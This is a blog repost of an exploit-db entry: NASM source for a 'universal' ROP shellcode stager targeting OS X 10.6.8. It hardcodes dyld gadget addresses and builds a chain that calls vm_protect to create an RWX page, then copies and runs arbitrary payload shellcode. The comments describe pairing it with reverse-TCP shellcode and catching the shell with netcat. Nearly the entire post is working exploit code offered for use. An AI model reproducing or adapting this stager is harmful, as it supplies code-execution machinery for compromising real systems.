Skip to content

OSX universal ROP shellcode Testado no SNOW LEOPARD

Published 03/10/2011


; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you should get a shell over nc
;
; see my blog, if you want to know how this works:
; http://gdtr.wordpress.com
;
; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com).
;
; pa_kt
; twitter.com/pa_kt

extern _printf

global _main

;————————————————–
;- DATA
;————————————————–
section .data

rw_area equ 0x00007FFF5FC50000
rwx_area equ rw_area+0x1000
vm_prot equ 0x00007FFF5FC0D356
fake_stack equ rw_area+0x2000
fake_frame equ fake_stack+0x100
r12_zero equ rw_area-0x1000

rax_off equ rw_area-8
rbx_off equ rw_area+8-8
rcx_off equ rw_area+0x10-8
rdx_off equ rw_area+0x18-8
rsi_off equ rw_area+0x28-8
rbp_off equ rw_area+0x30-8
rsp_off equ rw_area+0x38-8
r8_off equ rw_area+0x40-8
r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC
pop_rbx equ 0x00007FFF5FC23373
store_reg equ 0x00007FFF5FC24CE1
set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7
c_size equ 0x1000
c_addr equ rwx_area
c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area
; size = 0x1000
stub:
lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]
xor rcx, rcx
inc rcx
shl rcx, 12 ;rcx = 0x1000
lea rdi, [rel normal_shellcode]
rep movsb
;int 3
normal_shellcode:

stub_size equ $-stub

; order is important
rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,
dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,
dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,
dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,
dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,
dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,
dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack
dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)
dq pop_rdi, fake_frame-8-0x38, store_reg,
saved_rsp:
dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre
saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot
dq pop_rdi, rw_area, set_regs
; marker
; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin “x64_shellcode”
x64_shellcode_size equ $-x64_shellcode

hello db “test”, 0
fmt db “x%02x”,0

section .bss

rop_stage0 resq 100
copy_stub resq ((stub_size+7)/8)*5
copy_stub_size equ $-copy_stub

;————————————————–
;- CODE
;————————————————–
section .text

prep_stub:

mov rcx, (stub_size+7)/8
mov rsi, stub
mov rdi, copy_stub
mov rbx, rwx_area-8
go:
mov rax, pop_rdi
stosq
mov rax, rbx
stosq
mov rax, pop_rbx
stosq
movsq
mov rax, store_reg
stosq
add rbx, 8
loop go
ret

make_stage0:
mov rsi, rop_pre
mov rdi, rop_stage0
mov rcx, rop_pre_size
rep movsb

mov rsi, copy_stub
mov rcx, copy_stub_size
rep movsb

mov rsi, rop_post
mov rcx, rop_post_size
rep movsb

mov rsi, x64_shellcode
mov rcx, x64_shellcode_size
rep movsb

ret

print_it:
push rbp
mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size
lea rsi, [rel rop_stage0]
xor rax, rax
one_char:
lodsb
push rsi
push rcx
mov rsi, rax
mov rdi, qword fmt
xor rax, rax
call _printf
pop rcx
pop rsi
loop one_char

leave
ret

_main:
push qword rbp
mov rbp, rsp

call prep_stub
call make_stage0

call print_it

;lea rsp, [rel rop_stage0]
;ret

leave
ret

Fonte: http://www.exploit-db.com/exploits/17564/

Published in Blog

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.